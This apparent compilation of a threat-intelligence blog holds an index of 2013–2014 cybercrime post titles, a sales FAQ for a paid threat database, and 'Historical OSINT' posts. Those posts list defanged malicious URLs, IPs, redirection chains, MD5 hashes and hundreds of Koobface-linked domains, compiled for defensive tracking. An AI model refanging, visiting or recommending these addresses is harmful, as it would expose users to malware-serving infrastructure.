Google Play, tricks users into installing premium-rate SMS 
sending rogue apps 

• [351]419 advance fee fraudsters abuse CNN's 'Email This' 
Feature, spread Syrian Crisis themed scams 



• [352]Cybercriminals offer anonymous mobile numbers for 
'SMS activation', video tape the destruction of the SIM card 
on request 

• [353]Yet another 'malware-infected hosts as anonymization 
stepping stones' service offering access to hundreds of 
compromised hosts spotted in the wild 

• [354]Cybercriminals experiment with 'Socks4/Socks5/HTTP' 
malware-infected hosts based DIY DoS tool 

• [355]Cybercriminals sell access to tens of thousands of 
malware-infected Russian hosts 

• [356]Spamvertised "FDIC: Your business account" themed 
emails serve client-side exploits and malware 

• [357]Cybercriminals experiment with Android compatible, 
Python-based SQL injecting releases 

• [358]Newly launched E-shop offers access to hundreds of 
thousands of compromised accounts 

• [359]DIY commercial CAPTCHA-solving automatic email 
account registration tool available on the underground 
market since 2008 

• [360]Yet another subscription-based stealth Bitcoin mining 
tool spotted in the wild 

20. October - 2013 

• [361]A peek inside a Blackhat SEO/cybercrime-friendly 
doorways management platform 



• [362]Newly launched 'HTTP-based botnet setup as a 
service' empowers novice cybercriminals with bulletproof 
hosting capabilities - part two [363] 

• [364]'T-Mobile MMS message has arrived' themed emails 
lead to malware 

• [365]DDoS for hire vendor 'vertically integrates' starts 
offering TDoS attack capabilities 

• [366]Commercially available Blackhat SEO enabled multi- 
third-party product licenses empowered VPSs spotted 
in the wild 

• [367]New cybercrime-friendly iFrames-based E-shop for 
traffic spotted in the wild 

• [368]Cybercriminals offer spam-friendly SMTP servers for 
rent - part two 

• [369]Newly launched VDS-based cybercrime-friendly 
hosting provider helps facilitate fraudulent/malicious online 
activity 

• [370]Fake 'You have missed emails' GMail themed emails 
lead to pharmaceutical scams 

• [371]Compromised Turkish Government Web site leads to 
malware 

• [372]Novice cybercriminals offer commercial access to five 
mini botnets 

• [373]Spamvertised T-Mobile 'Picture ID Type:MMS' themed 
emails lead to malware 



• [374]Yet another Bitcoin accepting E-shop offering access 
to thousands of hacked PCs spotted in the wild 
• [375]Malicious 'FW: File' themed emails lead to malware 

• [376]Mass iframe injection campaign leads to Adobe Flash 
exploits 

• [377]Rogue ads lead to the 'Mipony Download 
Accelerator/FunMoods Toolbar' PUA (Potentially Unwanted 
Application) 

• [378]A peek inside the administration panel of a 
standardized E-shop for compromised accounts 

• [379]U.K users targeted with fake 'Confirming your Sky 
offer' malware serving emails 

• [380]New DIY compromised hosts/proxies syndicating tool 
spotted in the wild 

• [381]Rogue ads lead to the 'EzDownloaderpro' PUA 
(Potentially Unwanted Application) 

• [382]Fake 'Scanned Image from a Xerox WorkCentre' 
themed emails lead to malware 

• [383]Fake 'Important: Company Reports' themed emails 
lead to malware 

• [384]Cybercriminals release new commercially available 
Android/BlackBerry supporting mobile malware bot 



• [385]Fake WhatsApp 'Voice Message Notification/1 New 
Voicemail' themed emails lead to malware 

21. November - 2013 

• [386]Google-dorks based mass Web site hacking/SQL 
injecting tool helps facilitate malicious online activity 

• [387]Deceptive ads lead to the SpyAlertApp PUA 
(Potentially Unwanted Application) 

• [388]Cybercriminals differentiate their 'access to 
compromised PCs' service proposition, emphasize on the 
prevalence of 'female bot slaves' 

• [389]New vendor of 'professional DDoS for hire service' 
spotted in the wild 

• [390]Source code for proprietary spam bot offered for sale, 
acts as force multiplier for cybercrime-friendly activity 

• [391]Low Quality Assurance (QA) iframe campaign linked 
to May's Indian government Web site compromise spotted 
in the wild 

• [392]Popular French torrent portal tricks users into 
installing the BubbleDock/Downware/DownloadWare PUA 
(Potentially Unwanted Application) 

• [393]Web site of Brazilian 'Prefeitura Municipal de Jaqueira' 
compromised, leads to fake Adobe Flash player 



• [394]Malicious multi-hop iframe campaign affects 
thousands of Web sites, leads to a cocktail of client-side 
exploits 

• [395]Vendor of TDoS products/services releases new 
multi-threaded SIP-based TDoS tool 

• [396]Cybercriminals spamvertise tens of thousands of fake 
'Sent from my iPhone' themed emails, expose users to malware 

• [397]Fake 'Annual Form (STD-261) - Authorization to Use 
Privately Owned Vehicle on State Business' themed emails 
lead to malware 

• [398]'Newly released proxy-supporting Origin brute-forcing 
tools targets users with weak passwords' 
• [399]Fake WhatsApp 'Voice Message Notification' themed 
emails expose users to malware 

• [400]Cybercriminals impersonate HSBC through fake 
'payment e-Advice' themed emails, expose users to malware 

• [401]Fake 'MMS Gallery' notifications impersonate T-Mobile 
U.K, expose users to malware 

• [402]Fake 'October's Billing Address Code' (BAC) form 
themed spam campaign leads to malware 


21. December - 2013 



• [403]Cybercrime-friendly VPN service provider pitches 
itself as being 'recommended by Edward Snowden' 

• [404]Commercial Windows-based compromised Web shells 
management application spotted in the wild 

• [405]Compromised legitimate Web sites expose users to 
malicious Java/Symbian/Android "Browser Updates" 

• [406]Malicious multi-hop iframe campaign affects 
thousands of Web sites, leads to a cocktail of client-side 
exploits - part two 

• [407]How cybercriminals efficiently violate YouTube, 
Facebook, Twitter, Instagram, SoundCloud and Google+'s ToS 

• [408]Tumblr under fire from DIY CAPTCHA-solving, proxies- 
supporting automatic account registration tools 

• [409]Newly launched 'HTTP-based botnet setup as a 
service' empowers novice cybercriminals with bulletproof 

hosting capabilities - part three 

• [410]Cybercriminals offer fellow cybercriminals training in 
Operational Security (OPSEC) 

• [411]Fake 'WhatsApp Missed Voicemail' themed emails 
lead to pharmaceutical scams 

• [412]A peek inside the booming underground market for 
stealth Bitcoin/Litecoin mining tools 

• [413]Cybercrime Trends 2013 - Year in Review 



22. January - 2014 


• [414]'Adobe License Service Center Order NR' and 'Notice 
to appear in court' themed malicious spam campaigns 
intercepted in the wild 

• [415]Vendor of TDoS products resets market life cycle of 
well known 3G USB modem/GSM/SIM card-based TDoS tool 

• [416]New TDoS market segment entrant introduces 96 SIM 
cards compatible custom GSM module, positions itself as 
market disrupter 

• [417]DIY Python-based mass insecure WordPress 
scanning/exploiting tool with hundreds of pre-defined exploits 
spotted in the wild 

• [418]Google's reCAPTCHA under automatic fire from a 
newly launched reCAPTCHA-solving/breaking service 

• [419]Fully automated, API-supporting service, undermines 
Facebook and Google's 'SMS/Mobile number activation' 
account registration process 
• [420]Newly launched managed 'compromised/hacked 
accounts E-shop hosting as service' standardizes the 
monetization process 



• [421]Newly released Web based DDoS/Passwords stealing- 
capable DIY botnet generating tool spotted in the wild 

• [422]Cybercriminals release new Web based keylogging 
system, rely on penetration pricing to gain market share 

23. February - 2014 

• [423]Cybercriminals release Socks4/Socks5 based Alexa 
PageRank boosting application 

• [424]Market leading 'standardized cybercrime-friendly E- 
shop' service brings 2500+ boutique E-shops online 

• [425]Managed TeamViewer based anti-forensics capable 
virtual machines offered as a service 

• [426]Malicious campaign relies on rogue WordPress sites, 
leads to client-side exploits through the Magnitude 
exploit kit 

• [427]'Hacking for hire' teams occupy multiple underground 
market segments, monetize their malicious 'know how' 

• [428]DoubleClick malvertising campaign exposes long-run 
beneath the radar malvertising infrastructure 

• [429]Spamvertised 'Image has been sent' Evernote themed 
campaign serves client-side exploits 

• [430]Spamvertised 'You received a new message from 
Skype voicemail service' themed emails lead to Angler 
exploit kit 

24. March - 2014 

• [431]Deceptive ads expose users to PUA.InstallBrain/PC 
Performer PUA (Potentially Unwanted Application) 

• [432]Managed Web-based 300 GB/s capable DNS 
amplification enabled malware bot spotted in the wild 

• [433]Commercial Windows-based compromised Web shells 
management application spotted in the wild - part 

two 

• [434]Multiple spamvertised bogus online casino themed 
campaigns intercepted in the wild 

• [435]5M+ harvested Russian mobile numbers service 
exposes fraudulent infrastructure 

• [436]Socks4/Socks5 enabled hosts as a service introduces 
affiliate network based revenue sharing scheme 

• [437]A peek inside a modular, Tor C&C enabled, Bitcoin 
mining malware bot 

• [438]Managed anti-forensics IMEI modification services fuel 
growth in the non-attributable TDoS market segment 

• [439]Commercially available database of 52M+ ccTLD zone 
transfer domains spotted in the wild 

• [440]Deceptive ads expose users to the 
Adware.Linkular/Win32.SpeedUpMyPC.A PUAs (Potentially 
Unwanted Applications) 
• [441]DIY automatic cybercrime-friendly 'redirector 
generating' service spotted in the wild - part two 

• [442]Managed DDoS WordPress-targeting, XML-RPC API 
abusing service, spotted in the wild 

24. May - 2014 

• [443]Legitimate software apps impersonated in a blackhat 
SEO-friendly PUA (Potentially Unwanted Application) 
serving campaign 

• [444]DIY cybercrime-friendly (legitimate) APK 
injecting/decompiling app spotted in the wild 

• [445]Malicious DIY Java applet distribution platforms going 
mainstream - part two 

• [446]Spamvertised 'Error in calculation of your tax' themed 
emails lead to malware 

• [447]A peek inside a subscription-based DIY keylogging 
based type of botnet/malware generating tool 

• [448]Spamvertised 'Notification of payment received' 
themed emails lead to malware 

• [449]Malicious JJ Black Consultancy 'Computer Support 
Services' themed emails lead to malware 

• [450]A peek inside a newly launched all-in-one E-shop for 
cybercrime-friendly services 



• [451]Long run compromised accounting data based type of 
managed iframe-ing service spotted in the wild 

Enjoy! 
THE WORLD'S LEADING EXPERT IN 
CYBERCRIME AND CYBER SECURITY PRESENTS 
THE WORLD'S MOST COMPREHENSIVE CYBER 
THREATS DATABASE 

Russian Business Network Coverage - Koobface 
Botnet Coverage - Kneber Botnet Coverage - 
Hundreds of IOCs (Indicators of Compromise) - 
Tactics Techniques and Procedures - In-Depth 
Coverage - Malicious and Fraudulent Infrastructure 
Mapped and Exposed - Malicious and Fraudulent 
Blackhat SEO Coverage - Malicious Spam and 
Phishing Campaigns Coverage - Malicious and 
Fraudulent Scareware Campaigns Coverage 


Introducing Threat Data - The World's Most 
Comprehensive Threats Database (2018-09-20 16:30) 

Dear blog readers, I wanted to take the time and effort and 
introduce you to Threat Data - the World's Most Comprehensive 
Threats Database, a proprietary invite-only MISP-based data 
information and knowledge sharing community managed and 
operated by me which basically represents the vast majority of 
proprietary threat intelligence research that I produce on a 
daily basis these days. 

Users and organizations familiar with my research may be 
definitely interested in considering the opportunity to obtain 
access to Threat Data including a possible sample including a 
possible trial of the service. 

Find below a sample FAQ about Threat Data and consider 
obtaining access to ensure that you and your organization 
remains on the top of its game including ahead of current and 
emerging threats. 

01. How to request access including a possible trial 
including API access? 
Approach me at ddanchev@cryptogroup.net 

02. How do I obtain automated access? 

The database is delivered daily/weekly/quarterly in MISP- 
friendly JSON-capable format including STIX coverage. 

03. How to request a sample? 

Users interested in requesting a sample can approach me at 
dancho.danchev@hush.com and I'd be more than happy to offer 
a recent threat intelligence research snapshot. 

04. Tell me more about the pricing options? 



Monthly subscriptions covering daily weekly and monthly 
updates start at $4,000 including guaranteed access to 24-32 
analyses on a daily basis including active in-house all-source 
analysis guaranteeing that your organization remains on the 
top of its game by possessing the necessary data information 
and knowledge to stay ahead of current and emerging threats. 

05. What does the database cover? 

- Russian Business Network coverage 

- Koobface Botnet coverage 

- Kneber Botnet coverage 

- Hundreds of IOCs (Indicators of Compromise) 

- Tactics Techniques and Procedures In-Depth Coverage 

- Malicious and fraudulent infrastructure mapped and 
exposed 

- Malicious and fraudulent Blackhat SEO coverage 

- Malicious spam and phishing campaigns 

- Malicious and fraudulent scareware campaigns 

- Malicious and fraudulent money mule recruitment scams 

- Malicious and fraudulent reshipping mule recruitment 
scams 

- Web based mass attack compromise fraudulent and 
malicious campaigns 



- Malicious and fraudulent client-side exploits serving 
campaigns 

The database also offers active malvertising, scareware, 
rogueware, malware, phishing, spam, IM malware, mobile 
malware, mac OS X malware, android malware, blackhat SEO, 
money mule recruitment, reshipping mule recruitment, 
including ransomware coverage. 

06. How often does it update? 

Updates are issued on a daily weekly monthly basis 
guaranteeing unlimited access to in-house all-source analysis 
guaranteeing access to daily weekly and monthly updates. 

Enjoy! 
Historical OSINT - iPowerWeb Hacked Hundreds of 
Web Sites Affected (2018-10-19 18:17) 

In 2008 it became evident that a widespread malware- 
embedded attack took place successfully affecting hundreds 
of iPowerWeb customers potentially exposing hundreds of 
legitimate Web sites to a multitude of malicious software 
courtesy of a well known [1]Russian Business Network's 
hosting provider - HostFresh. 

In this post we'll profile the campaign provide actionable 
intelligence on the infrastructure behind it and discuss 
in-depth the tactics techniques and procedures of the 
cybercriminals behind it. We'll also establish a direct 
connection between the campaign's infrastructure and the 
[2]Russian Business Network. 

Malicious URL: hxxp://58.65.232.33/gpack/index.php 

Related malicious URLs known to have participated in the campaign: 

hxxp://58.65.232.25/counter/getexe.php?h=11 
hxxp://58.65.232.25/counter/getfile.php?f=pdf 

We'll continue monitoring the campaign and post updates as 
soon as new developments take place. 

1. https://ddanchev.blogspot.com/2013/08/dissecting-sample-russian-business.html 

2. https://ddanchev.blogspot.com/2017/05/historical-osint-inside-2007-2009.html 
Historical OSINT - Gumblar Botnet Infects Thousands of Sites Serves Adobe Flash Exploits (2018-10-19 22:46) 

According to [1]security researchers the [2]Gumblar botnet is making a comeback successfully affecting thousands of users globally potentially compromising the confidentiality availability and integrity of the targeted host to a multitude of malicious client-side exploits serving domains further dropping malicious software on the affected hosts. 

In this post we'll provide actionable intelligence on the infrastructure behind it and discuss in-depth the tactics techniques and procedures of the cybercriminals behind it. 

Malicious URLs known to have participated in the 
campaign: 

hxxp://ncenterpanel.cn/php/unv3.php 

hxxp://ncenterpanel.cn/php/p31.php 

Related malicious MD5s known to have participated in the campaign: 

MD5: 3f5b905c86d4dcaab9c86eddff1e02c7 
MD5: 61461d9c9c1954193e5e0d4148a81a0c 
MD5: 65cd1da3d4cc0616b4a0d4a862a865a6 
MD5: 7de29e5e10adc5d90296785c89aeabce 

Sample URL redirection chain: 

hxxp://gumblar.cn/rss/?id - 71.6.202.216 - Email: cuitiankai@googlemail.com 
hxxp://gumblar.cn/rss/?id=2 
hxxp://gumblar.cn/rss/?id=3 

Related malicious domains known to have participated in the campaign: 

hxxp://martuz.cn - 95.129.145.58 

With Gumblar making a comeback it's becoming evident that cybercriminals continue utilizing the usual set of malicious and fraudulent tactics for the purpose of spreading malicious software and affecting hundreds of thousands of legitimate Web sites in a cost-effective and efficient way. 

We'll continue monitoring the campaign and post updates as soon as new developments take place. 

1. https://en.wikipedia.org/wiki/Gumblar 

2. https://www.symantec.com/connect/blogs/gumblar-botnet-ramps-activity 

Historical OSINT - A Diverse Portfolio of Fake Security Software (2018-10-20 20:22) 

In this post I'll profile a currently circulating circa 2008 malicious and fraudulent scareware-serving campaign successfully enticing users into interacting with rogue and fraudulent fake security software with the cybercriminals behind the campaign successfully earning fraudulent revenue in the process of monetizing access to malware-infected hosts largely relying on the utilization of an affiliate-network based type of revenue-sharing scheme. 

Related malicious domains known to have participated in the campaign: 

hxxp://globals-advers.com 
hxxp://alldiskscheck300.com 
hxxp://multisearch1.com 
hxxp://myfreespace3.com 
hxxp://hottystars.com 
hxxp://multilang1.com 
hxxp://3gigabytes.com 
hxxp://drivemedirect.com 
hxxp://globala2.com/soft.php 
hxxp://teledisons.com 
hxxp://theworldnews5.com 
hxxp://virtualblog5.com 
hxxp://grander5.com 
hxxp://5starsblog.com 
hxxp://globalreds.com 
hxxp://global-advers.com 
hxxp://ratemyblog1.com 
hxxp://greatvideo3.com 
hxxp://beginner2009.com 
hxxp://fastwebway.com 
hxxp://blazervips.com 
hxxp://begin2009.com 
hxxp://megatradetds0.com 
hxxp://securedonlinewebspace.com 
hxxp://proweb-info.com 
hxxp://security-www-clicks.com 
hxxp://updatedownloadlists.com 
hxxp://styleonlyclicks.cn 
hxxp://informationgohere.com 
hxxp://world-click-service.com 
hxxp://secutitypowerclicks.cn 
hxxp://securedclickuser.cn 
hxxp://slickoverview.com 
hxxp://viewyourclicks.com 
hxxp://clickwww2.com 
hxxp://clickadsystem.com 
hxxp://becomepoweruser.cn 
hxxp://clickoverridesystem.cn 

Related malicious domains known to have participated in the campaign: 

hxxp://protecteduser.cn 
hxxp://internetprotectedweb.com 
hxxp://clicksadssystems.com 
hxxp://whereismyclick.cn/ 
hxxp://trustourclicks.cn 
hxxp://goldenstarclick.cn 
hxxp://defendedsystemuser.cn 

Related malicious domains known to have participated in the campaign: 

hxxp://drivemedirect.com 
hxxp://virtualblog5.com 
hxxp://fastwebway.com 

We'll continue monitoring the campaign and post updates as soon as new developments take place. 
Historical OSINT - Calling Zeus Home (2018-10-20 20:25) 

Remember ZeuS? The infamous crimeware-in-the-middle exploitation kit? In this post I'll provide historical OSINT on various ZeuS-themed malicious and fraudulent campaigns intercepted throughout 2008 and provide actionable intelligence on the infrastructure behind the campaign. 

Related malicious domains known to have participated in the campaign: 

hxxp://myxaxa.com/z/cfg.bin 
hxxp://dokymentu.info/zeus/cfg.bin 
hxxp://online-traffeng.com/zeus/cfg.bin 
hxxp://malwaremodel.biz/zeus/cfg.bin 
hxxp://giftcardsbox.com/web/cfg.bin 
hxxp://dOrnk.com/cfg.bin 
hxxp://rfs-group.net/cool/cfg.bin 
hxxp://62.176.16.19/11/cfg.bin 
hxxp://81.95.149.74/demo/cfg.bin 
hxxp://66.235.175.5/.cs/cfg.bin 
hxxp://208.72.169.152/web/cfg.bin 
hxxp://antispyware-protection.com/web/cfg.bin 
hxxp://sOsl.net/web/cfg.bin 
hxxp://208.72.169.151/admin/cfg.bin 
hxxp://lntrO.com/zuzu/cfg.bin 
hxxp://88.255.90.170/bt/fiz/cfg.bin 
hxxp://58.65.235.4/web/conf/cfg.bin 
hxxp://forgoogleonly.cn/open/cfg.bin 
hxxp://194.1.152.172/11/cfg.bin 

We'll continue monitoring the campaign and post updates as soon as new developments take place. 
Historical OSINT - Chinese Government Sites Serving Malware (2018-10-20 20:28) 

It's 2008 and I'm stumbling upon yet another decent portfolio of compromised malware-serving Chinese government Web sites. In this post I'll discuss in-depth the campaign and provide actionable intelligence on the infrastructure behind it. 

Compromised Chinese government Web site: 

hxxp://nynews.gov.cn 

Sample malicious domains known to have participated in the campaign: 

hxxp://game1983.com/index.htm 
hxxp://sp.070808.net/23.htm 
hxxp://higain-hitech.com/mm/index.html 

Currently affected Chinese government Web sites: 

hxxp://www.tgei.gov.cn/dom.txt - iframe - hxxp://www.bll0b.com/chbr/110.htm?id=884191 
hxxp://hfinvest.gov.cn/en/aboutus/index.asp - iframe - hxxp://nnbzcl2.kki.cn/indax.htm 
hxxp://www.whkx.gov.cn/iii.txt - iframe - hxxp://user.free2.77169.net/shmilyzhutou/evil.htm 
hxxp://xc.haqi.gov.cn/jay.htm - iframe - hxxp://xc.haqi.gov.cn/jay.htm - hxxp://qqnw.gov.cn/ST.htm 
hxxp://www.whkx.gov.cn/mohajem.txt - iframe - hxxp://user.free2.77169.net/shmilyzhutou/evil.htm 

We'll continue monitoring the campaign and post updates as soon as new developments take place. 
Historical OSINT - Hundreds of Bogus Bebo Accounts Serving Malware (2018-10-20 20:29) 

It's 2010 and I've recently intercepted a wide-spread Bebo malicious malware-serving campaign successfully enticing users into interacting with the fraudulent and malicious content potentially compromising the confidentiality availability and integrity of the targeted host to a multitude of malicious software. 

Sample malicious domains known to have participated in the campaign: 

hxxp://boss.gozbest.net/xd.html - 216.32.83.110 
hxxp://tafficbots.com/in.cgi?6 
hxxp://bolapaqir.com/in.cgi?2 
hxxp://mybig-porn.com/promo4/?aid=1339 

We'll continue monitoring the campaign and post updates as soon as new developments take place. 
Historical OSINT - PhishTube Twitter Broadcast Impersonated Scareware Serving Twitter Accounts Circulating (2018-10-20 22:10) 

It's 2010 and I've recently intercepted a currently circulating malicious and fraudulent malware-serving spam campaign successfully enticing hundreds of thousands of users globally into interacting with the rogue and malicious software found on the compromised hosts in combination with a currently active Twitter malware-serving campaign successfully enticing users into interacting with the rogue and bogus content. 

In this post I'll provide actionable intelligence on the infrastructure behind the campaign. 

Sample malicious domains known to have participated in the campaign: 

hxxp://PhishTube-Broadcast-811.5a5.us 
hxxp://Sony-195.5us.us 
hxxp://Hummer-631.5a5.us 
hxxp://PS3-502.24dat.com 
hxxp://PS3-843.5us.us 
hxxp://Air-France-133.5a5.us 
hxxp://PS3-519.5a5.us 
hxxp://Sony-918.24dat.us 
hxxp://Natal-29.5a5.us 

Sample malicious domains known to have participated in the campaign: 

hxxp://su7.us/tds/go.php?sid=1 

Sample URL redirection chain: 

hxxp://66.199.229.253/etds/go.php?sid=4 -> hxxp://mybig-porn.com/promo1/?aid=1470 -> hxxp://online-adult-directory.com/?aid=10012 -> hxxp://yourdatingnetwork.com/?aid=697 

Sample malware known to have participated in the campaign: 

MD5: a4ff9c2b4fd6917d12e962a7b6173143 
Historical OSINT - Massive Blackhat SEO Campaign Courtesy of the Koobface Gang Spotted in the Wild (2018-10-20 22:28) 

It's 2010 and I've recently stumbled upon yet another massive blackhat SEO campaign courtesy of the Koobface gang successfully exposing hundreds of thousands of users to a multitude of malicious software. 

In this post I'll provide actionable intelligence on the infrastructure behind it and discuss in-depth the tactics techniques and procedures of the cybercriminals behind it. 

Sample domains known to have participated in the campaign: 

hxxp://jhpegdueeunz.55fast.com 
hxxp://vzhusyeeaubk.55fast.com 
hxxp://cvzizliiustw.55fast.com 
hxxp://zetaswuiouax.55fast.com 
hxxp://shzopfioarpd.55fast.com 
hxxp://nqpubruioeat.55fast.com 
hxxp://krrepteievdr.55fast.com 
hxxp://gtoancoiuyqv.55fast.com 
hxxp://felopfooaydk.55fast.com 
hxxp://dknejxaeozjb.55fast.com 
hxxp://ljperwaaoxjs.55fast.com 
hxxp://hxmagxaeulbn.55fast.com 
hxxp://mueomboikgp.55fast.com 
hxxp://gluezneoolhs.55fast.com 
hxxp://ptpodseeanvk.55fast.com 
hxxp://jgdeyraoojdr.55fast.com 
hxxp://kjsetqaoojdr.55fast.com 
hxxp://kvuelveuicmn.55fast.com 
hxxp://ywoamnooikfp.55fast.com 
hxxp://dnkopgioawss.55fast.com 
hxxp://qjtepyaoigts.55fast.com 
hxxp://fdsudpeeewam.55fast.com 
hxxp://qumobxoiigst.55fast.com 
hxxp://fkvahzaeibbz.55fast.com 
hxxp://ixxikhiuutwm.55fast.com 
hxxp://meboczoiikgy.55fast.com 
hxxp://mevoxiiiidyq.55fast.com 
hxxp://hxvoysaoozhp.55fast.com 
hxxp://wiaabcoookfs.55fast.com 
hxxp://wlbatgeeiohc.55fast.com 

Sample malicious domains known to have participated in the campaign: 

hxxp://narezxaauggf.55fast.com 
hxxp://gclsetqaoocks.55fast.com 
hxxp://ptxihhiiihpq.55fast.com 
hxxp://ramiihueamxg.55fast.com 
hxxp://vvnoxiiiigsp.55fast.com 
hxxp://ywweypeaeemz.55fast.com 
hxxp://rqqetweeupwn.55fast.com 
hxxp://fprewmaoojpn.55fast.com 
hxxp://kbmahjiiigpw.55fast.com 
hxxp://romozjuuurov.55fast.com 
hxxp://tmxufseaacks.55fast.com 
hxxp://viaegjiooeun.55fast.com 
hxxp://znmasciiiicbc.55fast.com 
hxxp://gcibiczooaoaw.55fast.com 
hxxp://boqegkooouom.55fast.com 
hxxp://xncoxloiiwrm.55fast.com 
hxxp://flxowreuuhkb.55fast.com 
hxxp://zzkihgiuupwb.55fast.com 
hxxp://gxcobmeeuvis.55fast.com 
hxxp://wygimweuizxz.55fast.com 
hxxp://winowmeaoxhy.55fast.com 
hxxp://hhpewmaoicitm.55fast.com 
hxxp://nemoxioiixih.55fast.com 
hxxp://bvbowvooigtq.55fast.com 
hxxp://pgmassuiixvx.55fast.com 
hxxp://vbxoxkiiijst.55fast.com 
hxxp://cinobhaoobzf.55fast.com 
hxxp://proawnaoozxf.55fast.com 
Sample malicious domains known to have participated in the campaign: 

hxxp://romwrpueerr.007gb.com 
hxxp://rtperweaauux.5nxs.com 
hxxp://prougpeeabzd.hostevo.com 
hxxp://stwermoiigwc.10fast.net 
hxxp://znmasciiiicbc.55fast.com 
hxxp://gjxotyuuobmv.007sites.com 

Sample malicious domains known to have participated in the campaign: 

hxxp://dpfujhiuijhd.hostevo.com 
hxxp://gfhizliiikjd.hostevo.com 
hxxp://driozkuueqic.hostevo.com 
hxxp://rrkihfuuuspr.hostevo.com 
hxxp://xzkikhueeivf.hostevo.com 
hxxp://trqawmaookgp.hostevo.com 
hxxp://hggudseuerqn.hostevo.com 
hxxp://phveflaeulmn.hostevo.com 
hxxp://cvxiljiuuyrm.hostevo.com 
hxxp://fdseffuueqiv.hostevo.com 
hxxp://dsteyraaaxgr.hostevo.com 
hxxp://pfjocbeuiznb.hostevo.com 
hxxp://ccziljiuurab.hostevo.com 

Sample malicious domains known to have participated in the campaign: 

hxxp://jgfuspeeeauc.hostevo.com 
hxxp://grioxhueoxlf.hostevo.com 
hxxp://dpdilkiiihfy.hostevo.com 
hxxp://miuonbaoifwv.hostevo.com 
hxxp://fpteymoiuqmj.hostevo.com 
hxxp://ciyoovziuebvj.hostevo.com 
hxxp://rpdojzaaesgg.hostevo.com 
hxxp://zzkuhguuewib.hostevo.com 
hxxp://bqyunruiaecw.hostevo.com 
hxxp://sruoijiuurqb.hostevo.com 
hxxp://stratreaaebk.hostevo.com 
hxxp://kjsetwaookcit.hostevo.com 
hxxp://prougpeeabzci.hostevo.com 
hxxp://nrfitdioaoyd.hostevo.com 
hxxp://cxiigdueewoc.hostevo.com 
hxxp://tqaawmaoamvj.hostevo.com 
hxxp://qunoxiiiifyw.hostevo.com 
hxxp://zkfusteaanch.hostevo.com 
hxxp://qumobcooozjf.hostevo.com 
hxxp://sqqawmaaamvj.hostevo.com 
hxxp://kiguyraoojdr.hostevo.com 
hxxp://fspespueeiez.hostevo.com 
hxxp://sjcadjoaepfh.55fast.com 

Sample malicious domains known to have participated in the campaign: 

hxxp://pkbadlaeujcv.55fast.com 
hxxp://vnvocziiifst.55fast.com 
hxxp://wauanbooikfy.55fast.com 
hxxp://yovikdeaanch.55fast.com 
hxxp://jvuelvaeukcc.55fast.com 
hxxp://lkgufpeeaunz.55fast.com 
hxxp://kjfufseeeiml.55fast.com 
hxxp://bmmoxliiifdt.55fast.com 
hxxp://nqtuxneuixbb.55fast.com 
hxxp://wioabnaoikfp.55fast.com 
hxxp://ssdikzaaaiiq.55fast.com 
hxxp://rwaammaaeowm.55fast.com 
hxxp://lljifsueaumz.55fast.com 

Sample malicious domains known to have participated in the campaign: 

hxxp://nbzigpeaoksq.55fast.com 
hxxp://mvjufraoidqb.55fast.com 
hxxp://hgdupraoisqc.55fast.com 
hxxp://khdudseeeauc.55fast.com 
hxxp://fspetwaaabxh.55fast.com 
hxxp://tqoavxoiidyq.55fast.com 
hxxp://xeaubwuiardg.55fast.com 
hxxp://nbvoncoooihp.55fast.com 
hxxp://wexigpaoambi.55fast.com 
hxxp://kihuggiuufdt.55fast.com 
hxxp://dxwetteoigst.55fast.com 
hxxp://givashoaeygj.55fast.com 
hxxp://xmoejcaeujxc.55fast.com 
Sample malicious domains known to have participated in the campaign: 

hxxp://jfsfkfuueqw.007gb.com 
hxxp://bbxcimoiify.007gb.com 
hxxp://ijgjxkueewi.007gb.com 
hxxp://xzkgkguueaa.007gb.com 
hxxp://wmhjvkuaabj.007gb.com 
hxxp://yqbzmciuupt.007gb.com 
hxxp://lvxvieaoizj.007gb.com 
hxxp://srnvuioooikf.007gb.com 
hxxp://meihihueeqe.007gb.com 
hxxp://ikhjciueuwa.007gb.com 

Sample malicious domains known to have participated in the campaign: 

hxxp://bvgsfyaooxh.007gb.com 
hxxp://xbkhceeuifci.007gb.com 
hxxp://ywncmvoiojf.007gb.com 
hxxp://kjptpwaaaci.007gb.com 
hxxp://gpmcumooavx.007gb.com 
hxxp://cipwnaioookf.007gb.com 
hxxp://stqnaiaoihci.007gb.com 
hxxp://fspygfuuerq.007gb.com 
hxxp://wbgtsyeaamb.007gb.com 
hxxp://fprmwoaaavi.007gb.com 
hxxp://mmxinvoiijci.007gb.com 
hxxp://vviinmoooci.007gb.com 

Sample malicious domains known to have participated in the campaign: 

hxxp://vvllnmooocl.007gb.com 
hxxp://zlgsgpeaabz.007gb.com 
hxxp://ccjfxleeewq.007gb.com 
hxxp://cvhfjguueqi.007gb.com 
hxxp://lhprsraaack.007gb.com 
hxxp://razzbciiupt.007gb.com 
hxxp://rancoeooozh.007gb.com 
hxxp://muczimoooxh.007gb.com 
hxxp://tphotdioetdf.hostevo.com 
hxxp://vvxifpeaocks.hostevo.com 
hxxp://jjhillooolhf.hostevo.com 
hxxp://bzxixliiudpr.hostevo.com 
hxxp://xmvovxooozhp.hostevo.com 
hxxp://proocziuuprm.hostevo.com 
hxxp://qebovziuuswb.hostevo.com 
hxxp://xzhusteaabzs.hostevo.com 
hxxp://bbbovxiuifyq.hostevo.com 

Sample malicious domains known to have participated in the campaign: 

hxxp://dpretqaoocjy.hostevo.com 
hxxp://ywaaqbaoozjs.5nxs.com 
hxxp://fsyepteaaenl.5nxs.com 
hxxp://jhgufpeeeaic.5nxs.com 
hxxp://dsterqaaoczg.5nxs.com 
hxxp://rivilhueeiuc.5nxs.com 
hxxp://znouxneuaayd.5nxs.com 
hxxp://kkgijguueonh.5nxs.com 
hxxp://khsamvooihdt.5nxs.com 
hxxp://nncikgueaflg.5nxs.com 
hxxp://fdpixnaaaoiv.5nxs.com 
hxxp://zzzikhiiihfy.5nxs.com 
hxxp://sqaayteaaimz.5nxs.com 

Sample malicious domains known to have participated in the campaign: 

hxxp://tquambooilhs.5nxs.com 
hxxp://gdtaqboiojdt.5nxs.com 
hxxp://queoxliuudtq.5nxs.com 
hxxp://vbcokloiikhs.5nxs.com 
hxxp://raoadpiuigst.5nxs.com 
hxxp://qevijfueeibj.5nxs.com 
hxxp://kjlicvoooncj.5nxs.com 
hxxp://sroavlueeixd.5nxs.com 
hxxp://xxlijkiuuyqm.5nxs.com 
hxxp://vvcijreaaenl.5nxs.com 
hxxp://zzkigdueurab.5nxs.com 
hxxp://zxkigdueeoel.5nxs.com 
hxxp://tqoanvooijfy.5nxs.com 

Sample malicious domains known to have participated in the campaign: 

hxxp://wnxufpeaaevj.5nxs.com 
hxxp://ptaamboiihsw.5nxs.com 
